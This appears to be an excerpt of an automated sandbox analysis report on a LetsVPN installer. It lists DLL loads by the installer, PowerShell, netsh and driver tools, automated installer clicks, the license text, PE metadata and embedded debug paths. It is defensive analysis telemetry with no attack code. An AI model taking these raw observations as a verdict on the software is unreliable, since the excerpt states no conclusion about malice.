              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: dwmapi.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: cryptbase.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: oleacc.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: ntmarta.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: version.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: shfolder.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: kernel.appcore.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: windows.storage.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: wldp.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: profapi.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: riched20.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: usp10.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: msls31.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: textinputframework.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: coreuicomponents.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: coremessaging.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: wintypes.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: wintypes.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: wintypes.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: textshaping.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: linkinfo.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: ntshrui.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: sspicli.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: srvcli.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: cscapi.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: apphelp.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: devobj.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: msasn1.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: devrtl.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: spinf.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: drvstore.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: devobj.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: newdev.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: msasn1.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: cryptsp.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: rsaenh.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: cryptbase.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: gpapi.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: cabinet.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: umpnpmgr.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: devrtl.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: devrtl.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: drvstore.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: devrtl.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: drvstore.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: devobj.dll
              Source: C:\Windows\System32\drvinst.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netsetupsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netsetupuser.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: implatsetup.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: devrtl.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: spinf.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: drvstore.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: devobj.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\letsVPN.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32Jump to behavior
              Source: C:\Windows\System32\mmc.exeWindow found: window name: msctls_updown32Jump to behavior
              Source: C:\ProgramData\letsvpn-latest.exeAutomated click: Next >
              Source: C:\ProgramData\letsvpn-latest.exeAutomated click: I Agree
              Source: C:\ProgramData\letsvpn-latest.exeAutomated click: Install
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\ProgramData\letsvpn-latest.exeWindow detected: < &BackI &AgreeCancelNullsoft Install System v3.10 Nullsoft Install System v3.10License AgreementPlease review the license terms before installing letsvpn.Press Page Down to see the rest of the agreement.LetsVPN Terms of ServiceThese Terms of Service ("the Terms") govern your use of LetsVPN Services therefore we kindly ask you to carefully read them when visiting LetsVPN website before you register download install and use LetsVPN Services which include the LetsVPN software LetsVPN mobile applications and any services that LetsVPN (LetsVPN we us or our ) provides through our software application or otherwise (all of which collectively are referred as the LetsVPN Services).Please note that the Terms constitute a legally binding agreement (the Agreement) between you and LetsVPN. By visiting the website registering for installing and/or using LetsVPN Services on any platform or device you agree to be bound by these Terms. It is only under these Terms that LetsVPN allows visitors / users (the users) to use LetsVPN Services. If you do not agree to these Terms or any provisions hereof please do not install and do not use our software our mobile application and/or any of our products or services.Intellectual Property RightsThe website and all of the materials contained within LetsVPN are protected by intellectual property right laws. All of the materials and content include but not limited to the graphics design scripts logos page headers images button icons appearance downloads and any other information used to promote or provide the Services. All copyright trademarks design rights patents and any other intellectual property rights (whether registered or unregistered) for the Services and all of the materials contained within our services are either owned by us licensed to us or we are entitled to use it. All such rights are reserved.The Scope of Software LicensingA. Users can install use display and run the software on PC and mobile phones (same account support different devices).B. Reserved rights: All other rights not expressly authorized are still owned by LetsVPN team. Users must obtain additional written consent from LetsVPN team when using other rights.C. Except as expressly provided in this Agreement this Agreement does not stipulate the relevant Terms of Service for LetsVPN or other services of the partner using the Software. For these services there may be separate terms of service to regulate the user. Please be aware of and confirm separately when using LetsVPN Services. If the user uses the Services it is deemed to be an acceptance of the relevant Terms of Service.User InstructionsA. Users agree to obtain LetsVPN software and use LetsVPN Services from official channels; bear all losses and liabilities caused by him/herself including but not limited to: loss of account password account dispute with others etc.B. LetsVPN Accounta. You understand that it is your responsibility to keep your LetsVPN account information confidentia
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: letsVPN.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: letsVPN.exeStatic file information: File size 33128448 > 1048576
              Source: letsVPN.exeStatic PE information: section name: RT_CURSOR
              Source: letsVPN.exeStatic PE information: section name: RT_BITMAP
              Source: letsVPN.exeStatic PE information: section name: RT_ICON
              Source: letsVPN.exeStatic PE information: section name: RT_MENU
              Source: letsVPN.exeStatic PE information: section name: RT_DIALOG
              Source: letsVPN.exeStatic PE information: section name: RT_STRING
              Source: letsVPN.exeStatic PE information: section name: RT_ACCELERATOR
              Source: letsVPN.exeStatic PE information: section name: RT_GROUP_ICON
              Source: letsVPN.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1ecc400
              Source: Binary string: /_/artifacts/obj/System.IO.Packaging/net461-Release/System.IO.Packaging.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2432280356.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.PerformanceCounter/net461-Release/System.Diagnostics.PerformanceCounter.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2412144630.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Configuration.ConfigurationManager/net461-windows-Release/System.Configuration.ConfigurationManager.pdbSHA256h source: letsvpn-latest.exe, 00000015.00000003.2402252974.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ObjectModel\4.0.11.0\System.ObjectModel.pdbX+r+ d+_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2457151708.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Primitives\4.0.1.0\System.Reflection.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2458361290.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\git\OSS\notifyicon-wpf\Hardcodet.NotifyIcon.Wpf\Source\NotifyIconWpf\obj\Release\Hardcodet.Wpf.TaskbarNotification.pdb source: letsvpn-latest.exe, 00000015.00000003.2351020724.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Compression.ZipFile\4.0.3.0\System.IO.Compression.ZipFile.pdb( source: letsvpn-latest.exe, 00000015.00000003.2425718257.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.NameResolution\4.0.2.0\System.Net.NameResolution.pdb source: letsvpn-latest.exe, 00000015.00000003.2449120272.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\users\samuli\opt\tap-windows6-mattock\tapinstall\7600\objfre_wlh_amd64\amd64\tapinstall.pdb source: letsvpn-latest.exe, 00000015.00000003.2343440386.000000000310D000.00000004.00000020.00020000.00000000.sdmp, tapinstall.exe, tapinstall.exe, 00000021.00000000.2603866703.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000021.00000002.2606131178.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000023.00000000.2607796952.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000023.00000002.2660016264.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000029.00000000.2665972836.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000029.00000002.2668002400.00007FF796191000.00000020.00000001.01000000.00000017.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdb source: letsvpn-latest.exe, 00000015.00000003.2465608542.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem\4.0.3.0\System.IO.FileSystem.pdb8)R) D)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2430089756.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.Ports/net461-windows-Release/System.IO.Ports.pdbSHA256T source: letsvpn-latest.exe, 00000015.00000003.2434348436.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Net.Http\netfx\System.Net.Http.pdb source: letsvpn-latest.exe, 00000015.00000003.2444994668.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/CommunityToolkit.Mvvm/obj/Release/netstandard2.0/CommunityToolkit.Mvvm.pdb source: letsvpn-latest.exe, 00000015.00000003.2347348631.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.ResourceManager\4.0.1.0\System.Resources.ResourceManager.pdb source: letsvpn-latest.exe, 00000015.00000003.2460388898.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb* source: letsvpn-latest.exe, 00000015.00000003.2413088913.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.CodeDom/net461-Release/System.CodeDom.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2395719645.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Permissions/net461-windows-Release/System.Security.Permissions.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2482115637.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO\4.1.2.0\System.IO.pdb source: letsvpn-latest.exe, 00000015.00000003.2436159752.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Http.Facade/Release/net461/System.ServiceModel.Http.pdb source: letsvpn-latest.exe, 00000015.00000003.2485461661.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Mannelig\Dev\Projects\NET\WpfToastNotifications\Src\ToastNotifications.Messages\obj\Release\ToastNotifications.Messages.pdb source: letsvpn-latest.exe, 00000015.00000003.2510367582.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq\4.1.2.0\System.Linq.pdb source: letsvpn-latest.exe, 00000015.00000003.2438986157.0000000003103000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\PowerShellStandard\src\5\obj\Release\net452\System.Management.Automation.pdb source: letsvpn-latest.exe, 00000015.00000003.2439963735.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Principal.Windows/net461-Windows_NT-Release/System.Security.Principal.Windows.pdb source: letsvpn-latest.exe, 00000015.00000003.2482765464.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Cng/net462-Windows_NT-Release/System.Security.Cryptography.Cng.pdb source: letsvpn-latest.exe, 00000015.00000003.2476891907.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Http.Facade/Release/net461/System.ServiceModel.Http.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2485461661.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Drawing.Primitives\4.0.2.0\System.Drawing.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2422275505.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Code\SVGImage\Source\SVGImage\obj\Release\net46\SVGImage.pdb4 source: letsvpn-latest.exe, 00000015.00000003.2387449334.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Data.Common/netfx\System.Data.Common.pdb source: letsvpn-latest.exe, 00000015.00000003.2404217100.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.DriveInfo\4.0.2.0\System.IO.FileSystem.DriveInfo.pdb source: letsvpn-latest.exe, 00000015.00000003.2427925785.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Drawing.Common/net461-Release/System.Drawing.Common.pdb source: letsvpn-latest.exe, 00000015.00000003.2421605703.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Principal.Windows/net461-Windows_NT-Release/System.Security.Principal.Windows.pdbSHA256zqXL source: letsvpn-latest.exe, 00000015.00000003.2482765464.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\ipnetwork\src\System.Net.IPNetwork\obj\release\net46\System.Net.IPNetwork.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2448378119.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: WebView2Loader.dll.pdb source: letsvpn-latest.exe, 00000015.00000003.2548790969.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2549736766.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2532359681.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Writer\4.0.2.0\System.Resources.Writer.pdb source: letsvpn-latest.exe, 00000015.00000003.2461540941.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\Utils\obj\Release\Utils.pdb} source: letsvpn-latest.exe, 00000015.00000003.2511835079.0000000003107000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000002.2707489755.0000000002AE2000.00000002.00000001.01000000.0000001B.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.FileSystem.AccessControl/net461-Windows_NT-Release/System.IO.FileSystem.AccessControl.pdb source: letsvpn-latest.exe, 00000015.00000003.2427249468.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Syndication/net461-Release/System.ServiceModel.Syndication.pdb source: letsvpn-latest.exe, 00000015.00000003.2488139644.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\obj\Release\net40\Mono.Cecil.pdbSHA256) source: letsvpn-latest.exe, 00000015.00000003.2379243714.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensionsAsync\obj\Release\netstandard1.1\SQLiteNetExtensionsAsync.pdbSHA2562` source: letsvpn-latest.exe, 00000015.00000003.2383763587.0000000003106000.00000004.00000020.00020000.00000000.sdmp
